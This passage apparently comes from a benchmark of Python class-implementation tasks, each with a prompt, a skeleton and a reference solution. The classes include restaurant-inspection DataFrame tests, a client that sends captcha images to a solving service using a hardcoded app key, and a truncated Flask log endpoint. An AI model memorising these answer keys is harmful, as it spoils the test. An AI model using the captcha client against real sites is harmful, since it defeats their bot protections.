worst_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[1], worst_restaurant)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000120", "length_bytes": 6403, "license_type": "no_license", "methods": [{"docstring": "Test that the function correctly returns the observations of the best restaurant", "name": "test_get_best_data", "signature": "def test_get_best_data(self)"}, {"docstring": "Test that the function correctly returns the observations of the worst restaurant", "name": "test_get_worst_data", "signature": "def test_get_worst_data(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004566", "prompt": "Implement the Python class `GetBestAndWorstDataTests` described below.\n\nClass description:\nCheck that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\n\nMethod signatures and docstrings:\n- def test_get_best_data(self): Test that the function correctly returns the observations of the best restaurant\n- def test_get_worst_data(self): Test that the function correctly returns the observations of the worst restaurant", "prompted_full_text": "Implement the Python class `GetBestAndWorstDataTests` described below.\n\nClass description:\nCheck that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\n\nMethod signatures and docstrings:\n- def test_get_best_data(self): Test that the function correctly returns the observations of the best restaurant\n- def test_get_worst_data(self): Test that the function correctly returns the observations of the worst restaurant\n\n<|skeleton|>\nclass GetBestAndWorstDataTests:\n \"\"\"Check that get_best_and_worst_data returns the DataFrames of the best 
and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\"\"\"\n\n def test_get_best_data(self):\n \"\"\"Test that the function correctly returns the observations of the best restaurant\"\"\"\n <|body_0|>\n\n def test_get_worst_data(self):\n \"\"\"Test that the function correctly returns the observations of the worst restaurant\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n best_data = {'cuisine_primary': ['thai'], 'restaurant': ['thai garden'], 'boro': ['manhattan'], 'swc_type': ['no cafe'], 'score': [0], 'grade': ['a'], 'inspectiondate': ['1/2/2014']}\n best_restaurant = pd.DataFrame(best_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n best_restaurant['inspectiondate'] = pd.to_datetime(best_restaurant['inspectiondate'], format='%m/%d/%Y')\n best_restaurant = best_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[0], best_restaurant)\n<|end_body_0|>\n\n<|body_start_1|>\n worst_data = {'cuisine_primary': ['pizza'], 'restaurant': [\"'za for days\"], 'boro': ['brooklyn'], 'swc_type': ['no cafe'], 'score': [100], 'grade': ['c'], 'inspectiondate': ['3/7/2012']}\n worst_restaurant = pd.DataFrame(worst_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n worst_restaurant['inspectiondate'] = pd.to_datetime(worst_restaurant['inspectiondate'], format='%m/%d/%Y')\n worst_restaurant = worst_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[1], worst_restaurant)\n<|end_body_1|>\n", "revision_id": "dc9185cbc5e65650d985ebecf877a157c8c19a13", "skeleton": "<|skeleton|>\nclass GetBestAndWorstDataTests:\n \"\"\"Check that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\"\"\"\n\n def test_get_best_data(self):\n \"\"\"Test that the function correctly returns the observations of the best restaurant\"\"\"\n <|body_0|>\n\n def test_get_worst_data(self):\n \"\"\"Test that the function correctly returns the observations of the worst restaurant\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GetBestAndWorstDataTests:\n \"\"\"Check that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\"\"\"\n\n def test_get_best_data(self):\n \"\"\"Test that the function correctly returns the observations of the best restaurant\"\"\"\n best_data = {'cuisine_primary': ['thai'], 'restaurant': ['thai garden'], 'boro': ['manhattan'], 'swc_type': ['no cafe'], 'score': [0], 'grade': ['a'], 'inspectiondate': ['1/2/2014']}\n best_restaurant = pd.DataFrame(best_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n best_restaurant['inspectiondate'] = pd.to_datetime(best_restaurant['inspectiondate'], format='%m/%d/%Y')\n best_restaurant = best_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[0], best_restaurant)\n\n def test_get_worst_data(self):\n \"\"\"Test that the function correctly returns the 
observations of the worst restaurant\"\"\"\n worst_data = {'cuisine_primary': ['pizza'], 'restaurant': [\"'za for days\"], 'boro': ['brooklyn'], 'swc_type': ['no cafe'], 'score': [100], 'grade': ['c'], 'inspectiondate': ['3/7/2012']}\n worst_restaurant = pd.DataFrame(worst_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n worst_restaurant['inspectiondate'] = pd.to_datetime(worst_restaurant['inspectiondate'], format='%m/%d/%Y')\n worst_restaurant = worst_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[1], worst_restaurant)\n", "source": "the_stack_v2_python_sparse", "source_path": "lh1036/test_inspectiongrades/test_visualizer.py", "source_repo": "ds-ga-1007/final_project", "split": "test", "star_events_count": 0} {"blob_id": "61dee8bbdd3e224d3d43d1c325a9de341ffd7bcf", "bodies": ["self.base_url = 'http://api.yundama.com/api.php'\nself.base_headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)', 'Host': 'api.yundama.com', 'Referer': 'http://www.yundama.com/download/YDMHttp.html', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Origin': 'http://www.yundama.com'}\nself.user_name = user_name\nself.pass_word = pass_word\nself.appid = '1' if not appid else appid\nself.appkey = '22cc5376925e9387a23cf797cb9ba745' if not appkey else appkey\nreturn", "cid = self.upload(file_name, file_bytes, file_type, codetype)\nif not cid:\n return (None, None)\nwhile repeat > 0:\n code = self.result(cid)\n if code:\n return (cid, code)\n repeat -= 1\n time.sleep(2)\nreturn (cid, None)", "post_data = {'username': self.user_name, 'password': self.pass_word, 'codetype': codetype, 'appid': self.appid, 'appkey': self.appkey, 'timeout': 60, 'method': 'upload'}\nfiles = {'file': (file_name, file_bytes, file_type)}\ntry:\n response = requests.post(self.base_url, data=post_data, headers=self.base_headers, files=files)\n json_data = response.json()\nexcept Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\nlogging.warning('YunDaMa upload %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\nreturn json_data.get('cid', '')", "try:\n response = requests.get(self.base_url + '?cid=%d&method=result' % cid, headers=self.base_headers)\n json_data = response.json()\nexcept Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\nlogging.warning('YunDaMa result %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\nreturn json_data.get('text', '')"], "bodies_text": "<|body_start_0|>\n self.base_url = 'http://api.yundama.com/api.php'\n self.base_headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)', 'Host': 'api.yundama.com', 'Referer': 'http://www.yundama.com/download/YDMHttp.html', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Origin': 'http://www.yundama.com'}\n self.user_name = user_name\n self.pass_word = pass_word\n self.appid = '1' if not appid else appid\n self.appkey = '22cc5376925e9387a23cf797cb9ba745' if not appkey else appkey\n return\n<|end_body_0|>\n\n<|body_start_1|>\n cid = self.upload(file_name, file_bytes, file_type, codetype)\n if not cid:\n return (None, None)\n while repeat > 0:\n code = self.result(cid)\n if code:\n return (cid, code)\n repeat -= 1\n time.sleep(2)\n return (cid, 
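The GetBestAndWorstDataTests record that closes above compares DataFrames with numpy's assert_array_equal, which looks at values only. A self-contained sketch of the stricter pandas alternative, which also checks index, columns and dtypes; the toy frame mirrors the shape the tests build but is otherwise illustrative.

```python
import pandas as pd

# A single-row frame indexed by restaurant, like the expected frames in the tests.
expected = pd.DataFrame({'score': [0], 'grade': ['a']},
                        index=pd.Index(['thai garden'], name='restaurant'))
actual = expected.copy()

# Passes silently here; on any mismatch it raises AssertionError with a diff,
# covering index names and dtypes that assert_array_equal would ignore.
pd.testing.assert_frame_equal(actual, expected)
```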
None)\n<|end_body_1|>\n\n<|body_start_2|>\n post_data = {'username': self.user_name, 'password': self.pass_word, 'codetype': codetype, 'appid': self.appid, 'appkey': self.appkey, 'timeout': 60, 'method': 'upload'}\n files = {'file': (file_name, file_bytes, file_type)}\n try:\n response = requests.post(self.base_url, data=post_data, headers=self.base_headers, files=files)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa upload %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('cid', '')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n response = requests.get(self.base_url + '?cid=%d&method=result' % cid, headers=self.base_headers)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa result %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('text', '')\n<|end_body_3|>\n", "class_docstring": "class of YunDaMa, to identify captcha by yundama.com", "class_name": "YunDaMa", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass YunDaMa:\n \"\"\"class of YunDaMa, to identify captcha by yundama.com\"\"\"\n\n def __init__(self, user_name, pass_word, appid=None, appkey=None):\n \"\"\"constructor\"\"\"\n <|body_0|>\n\n def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10):\n \"\"\"get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\"\"\"\n <|body_1|>\n\n def upload(self, file_name, file_bytes, file_type, codetype):\n \"\"\"upload image file, return cid or None\"\"\"\n <|body_2|>\n\n def result(self, cid):\n \"\"\"get result from cid, return code or None\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.base_url = 'http://api.yundama.com/api.php'\n self.base_headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)', 'Host': 'api.yundama.com', 'Referer': 'http://www.yundama.com/download/YDMHttp.html', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Origin': 'http://www.yundama.com'}\n self.user_name = user_name\n self.pass_word = pass_word\n self.appid = '1' if not appid else appid\n self.appkey = '22cc5376925e9387a23cf797cb9ba745' if not appkey else appkey\n return\n<|end_body_0|>\n\n<|body_start_1|>\n cid = self.upload(file_name, file_bytes, file_type, codetype)\n if not cid:\n return (None, None)\n while repeat > 0:\n code = self.result(cid)\n if code:\n return (cid, code)\n repeat -= 1\n time.sleep(2)\n return (cid, None)\n<|end_body_1|>\n\n<|body_start_2|>\n post_data = {'username': self.user_name, 'password': self.pass_word, 'codetype': codetype, 'appid': self.appid, 'appkey': self.appkey, 'timeout': 60, 'method': 'upload'}\n files = {'file': (file_name, file_bytes, file_type)}\n try:\n response = requests.post(self.base_url, data=post_data, headers=self.base_headers, files=files)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa upload %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('cid', '')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n response = requests.get(self.base_url + 
'?cid=%d&method=result' % cid, headers=self.base_headers)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa result %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('text', '')\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000121", "length_bytes": 3324, "license_type": "permissive", "methods": [{"docstring": "constructor", "name": "__init__", "signature": "def __init__(self, user_name, pass_word, appid=None, appkey=None)"}, {"docstring": "get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html", "name": "get_captcha", "signature": "def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10)"}, {"docstring": "upload image file, return cid or None", "name": "upload", "signature": "def upload(self, file_name, file_bytes, file_type, codetype)"}, {"docstring": "get result from cid, return code or None", "name": "result", "signature": "def result(self, cid)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_005150", "prompt": "Implement the Python class `YunDaMa` described below.\n\nClass description:\nclass of YunDaMa, to identify captcha by yundama.com\n\nMethod signatures and docstrings:\n- def __init__(self, user_name, pass_word, appid=None, appkey=None): constructor\n- def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10): get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\n- def upload(self, file_name, file_bytes, file_type, codetype): upload image file, return cid or None\n- def result(self, cid): get result from cid, return code or None", "prompted_full_text": "Implement the Python class `YunDaMa` described below.\n\nClass description:\nclass of YunDaMa, to identify captcha by yundama.com\n\nMethod signatures and docstrings:\n- def __init__(self, user_name, pass_word, appid=None, appkey=None): constructor\n- def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10): get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\n- def upload(self, file_name, file_bytes, file_type, codetype): upload image file, return cid or None\n- def result(self, cid): get result from cid, return code or None\n\n<|skeleton|>\nclass YunDaMa:\n \"\"\"class of YunDaMa, to identify captcha by yundama.com\"\"\"\n\n def __init__(self, user_name, pass_word, appid=None, appkey=None):\n \"\"\"constructor\"\"\"\n <|body_0|>\n\n def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10):\n \"\"\"get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\"\"\"\n <|body_1|>\n\n def upload(self, file_name, file_bytes, file_type, codetype):\n \"\"\"upload image file, return cid or None\"\"\"\n <|body_2|>\n\n def result(self, cid):\n \"\"\"get result from cid, return code or None\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.base_url = 'http://api.yundama.com/api.php'\n self.base_headers = {'User-Agent': 
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)', 'Host': 'api.yundama.com', 'Referer': 'http://www.yundama.com/download/YDMHttp.html', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Origin': 'http://www.yundama.com'}\n self.user_name = user_name\n self.pass_word = pass_word\n self.appid = '1' if not appid else appid\n self.appkey = '22cc5376925e9387a23cf797cb9ba745' if not appkey else appkey\n return\n<|end_body_0|>\n\n<|body_start_1|>\n cid = self.upload(file_name, file_bytes, file_type, codetype)\n if not cid:\n return (None, None)\n while repeat > 0:\n code = self.result(cid)\n if code:\n return (cid, code)\n repeat -= 1\n time.sleep(2)\n return (cid, None)\n<|end_body_1|>\n\n<|body_start_2|>\n post_data = {'username': self.user_name, 'password': self.pass_word, 'codetype': codetype, 'appid': self.appid, 'appkey': self.appkey, 'timeout': 60, 'method': 'upload'}\n files = {'file': (file_name, file_bytes, file_type)}\n try:\n response = requests.post(self.base_url, data=post_data, headers=self.base_headers, files=files)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa upload %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('cid', '')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n response = requests.get(self.base_url + '?cid=%d&method=result' % cid, headers=self.base_headers)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa result %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('text', '')\n<|end_body_3|>\n", "revision_id": "d7981ba9806cf89200ce249f727aabf96918b67d", "skeleton": "<|skeleton|>\nclass YunDaMa:\n \"\"\"class of YunDaMa, to identify captcha by yundama.com\"\"\"\n\n def __init__(self, user_name, pass_word, appid=None, appkey=None):\n \"\"\"constructor\"\"\"\n <|body_0|>\n\n def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10):\n \"\"\"get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\"\"\"\n <|body_1|>\n\n def upload(self, file_name, file_bytes, file_type, codetype):\n \"\"\"upload image file, return cid or None\"\"\"\n <|body_2|>\n\n def result(self, cid):\n \"\"\"get result from cid, return code or None\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class YunDaMa:\n \"\"\"class of YunDaMa, to identify captcha by yundama.com\"\"\"\n\n def __init__(self, user_name, pass_word, appid=None, appkey=None):\n \"\"\"constructor\"\"\"\n self.base_url = 'http://api.yundama.com/api.php'\n self.base_headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)', 'Host': 'api.yundama.com', 'Referer': 'http://www.yundama.com/download/YDMHttp.html', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Origin': 'http://www.yundama.com'}\n self.user_name = user_name\n self.pass_word = pass_word\n self.appid = '1' if not appid else appid\n self.appkey = '22cc5376925e9387a23cf797cb9ba745' if not appkey else appkey\n return\n\n def get_captcha(self, file_name, file_bytes, 
file_type='image/jpeg', codetype='1000', repeat=10):\n \"\"\"get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\"\"\"\n cid = self.upload(file_name, file_bytes, file_type, codetype)\n if not cid:\n return (None, None)\n while repeat > 0:\n code = self.result(cid)\n if code:\n return (cid, code)\n repeat -= 1\n time.sleep(2)\n return (cid, None)\n\n def upload(self, file_name, file_bytes, file_type, codetype):\n \"\"\"upload image file, return cid or None\"\"\"\n post_data = {'username': self.user_name, 'password': self.pass_word, 'codetype': codetype, 'appid': self.appid, 'appkey': self.appkey, 'timeout': 60, 'method': 'upload'}\n files = {'file': (file_name, file_bytes, file_type)}\n try:\n response = requests.post(self.base_url, data=post_data, headers=self.base_headers, files=files)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa upload %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('cid', '')\n\n def result(self, cid):\n \"\"\"get result from cid, return code or None\"\"\"\n try:\n response = requests.get(self.base_url + '?cid=%d&method=result' % cid, headers=self.base_headers)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa result %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('text', '')\n", "source": "the_stack_v2_python_sparse", "source_path": "cola/utilities/yundama.py", "source_repo": "brightgems/cola", "split": "test", "star_events_count": 1} {"blob_id": "94bee6a377ebd61106d4c5da29f84a1645f56fda", "bodies": ["args = parser.parse_args()\nrequest_id = args.get('request_id')\nstatus_num = args.get('status_num')\npage = args.get('pgnum')\nif not page:\n page = 1\noptions = {'page': page, 'request_id': request_id, 'status_num': status_num}\nif log_list_c(options=options):\n request_logs, pg = log_list_c(options=options)\n response_data['code'] = 1200\n response_data['ok'] = True\n response_data['data'] = request_logs\n response_data['msg'] = '获取日志信息成功'\n response_data['pg'] = pg\n return response_data\nelse:\n response_data['code'] = 1204\n response_data['msg'] = '搜索日志结果不存在'\n response_data['ok'] = False\n response_data['data'] = ''\n response_data['pg'] = ''\n return response_data", "response_data['data'] = ''\nresponse_data['pg'] = ''\nif id:\n result = log_delete_c(id=id)\n if result:\n response_data['msg'] = '删除成功'\n response_data['ok'] = True\n response_data['code'] = 1200\n else:\n response_data['msg'] = '不存在的请求日志ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\nelse:\n response_data['msg'] = '请输入ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data"], "bodies_text": "<|body_start_0|>\n args = parser.parse_args()\n request_id = args.get('request_id')\n status_num = args.get('status_num')\n page = args.get('pgnum')\n if not page:\n page = 1\n options = {'page': page, 'request_id': request_id, 'status_num': status_num}\n if log_list_c(options=options):\n request_logs, pg = log_list_c(options=options)\n response_data['code'] = 1200\n response_data['ok'] = True\n response_data['data'] = request_logs\n response_data['msg'] = '获取日志信息成功'\n response_data['pg'] = pg\n return response_data\n else:\n response_data['code'] = 1204\n 
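A usage sketch for the YunDaMa client defined in the record above, with the class assumed in scope together with its requests/time/logging imports. The credentials and image path are placeholders, not real values; get_captcha already polls result() up to `repeat` times at two-second intervals, so one call covers the whole upload-then-poll flow.

```python
ydm = YunDaMa('my_username', 'my_password')  # placeholder account

with open('captcha.jpg', 'rb') as image:     # placeholder image file
    cid, code = ydm.get_captcha('captcha.jpg', image.read())

if code:
    print('task %s decoded as %r' % (cid, code))
else:
    print('no answer for task %s within the polling window' % cid)
```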
response_data['msg'] = '搜索日志结果不存在'\n response_data['ok'] = False\n response_data['data'] = ''\n response_data['pg'] = ''\n return response_data\n<|end_body_0|>\n\n<|body_start_1|>\n response_data['data'] = ''\n response_data['pg'] = ''\n if id:\n result = log_delete_c(id=id)\n if result:\n response_data['msg'] = '删除成功'\n response_data['ok'] = True\n response_data['code'] = 1200\n else:\n response_data['msg'] = '不存在的请求日志ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n else:\n response_data['msg'] = '请输入ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n<|end_body_1|>\n", "class_docstring": "", "class_name": "LogRequest", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LogRequest:\n\n def get(self):\n \"\"\"获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\"\"\"\n <|body_0|>\n\n def delete(self, id=None):\n \"\"\"根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n args = parser.parse_args()\n request_id = args.get('request_id')\n status_num = args.get('status_num')\n page = args.get('pgnum')\n if not page:\n page = 1\n options = {'page': page, 'request_id': request_id, 'status_num': status_num}\n if log_list_c(options=options):\n request_logs, pg = log_list_c(options=options)\n response_data['code'] = 1200\n response_data['ok'] = True\n response_data['data'] = request_logs\n response_data['msg'] = '获取日志信息成功'\n response_data['pg'] = pg\n return response_data\n else:\n response_data['code'] = 1204\n response_data['msg'] = '搜索日志结果不存在'\n response_data['ok'] = False\n response_data['data'] = ''\n response_data['pg'] = ''\n return response_data\n<|end_body_0|>\n\n<|body_start_1|>\n response_data['data'] = ''\n response_data['pg'] = ''\n if id:\n result = log_delete_c(id=id)\n if result:\n response_data['msg'] = '删除成功'\n response_data['ok'] = True\n response_data['code'] = 1200\n else:\n response_data['msg'] = '不存在的请求日志ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n else:\n response_data['msg'] = '请输入ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000122", "length_bytes": 3392, "license_type": "no_license", "methods": [{"docstring": "获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson", "name": "get", "signature": "def get(self)"}, {"docstring": "根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 
200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson", "name": "delete", "signature": "def delete(self, id=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006521", "prompt": "Implement the Python class `LogRequest` described below.\n\nClass description:\nImplement the LogRequest class.\n\nMethod signatures and docstrings:\n- def get(self): 获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\n- def delete(self, id=None): 根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson", "prompted_full_text": "Implement the Python class `LogRequest` described below.\n\nClass description:\nImplement the LogRequest class.\n\nMethod signatures and docstrings:\n- def get(self): 获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\n- def delete(self, id=None): 根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson\n\n<|skeleton|>\nclass LogRequest:\n\n def get(self):\n \"\"\"获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\"\"\"\n <|body_0|>\n\n def delete(self, id=None):\n \"\"\"根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n args = parser.parse_args()\n request_id = args.get('request_id')\n status_num = args.get('status_num')\n page = args.get('pgnum')\n if not page:\n page = 1\n options = {'page': page, 'request_id': request_id, 'status_num': status_num}\n if log_list_c(options=options):\n request_logs, pg = log_list_c(options=options)\n response_data['code'] = 1200\n response_data['ok'] = True\n response_data['data'] = request_logs\n response_data['msg'] = '获取日志信息成功'\n response_data['pg'] = pg\n return response_data\n else:\n response_data['code'] = 1204\n response_data['msg'] = '搜索日志结果不存在'\n response_data['ok'] = False\n response_data['data'] = ''\n 
response_data['pg'] = ''\n return response_data\n<|end_body_0|>\n\n<|body_start_1|>\n response_data['data'] = ''\n response_data['pg'] = ''\n if id:\n result = log_delete_c(id=id)\n if result:\n response_data['msg'] = '删除成功'\n response_data['ok'] = True\n response_data['code'] = 1200\n else:\n response_data['msg'] = '不存在的请求日志ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n else:\n response_data['msg'] = '请输入ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n<|end_body_1|>\n", "revision_id": "73246bbd492fd991e0329b9a011b5380b11a1618", "skeleton": "<|skeleton|>\nclass LogRequest:\n\n def get(self):\n \"\"\"获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\"\"\"\n <|body_0|>\n\n def delete(self, id=None):\n \"\"\"根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LogRequest:\n def get(self):\n \"\"\"获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: 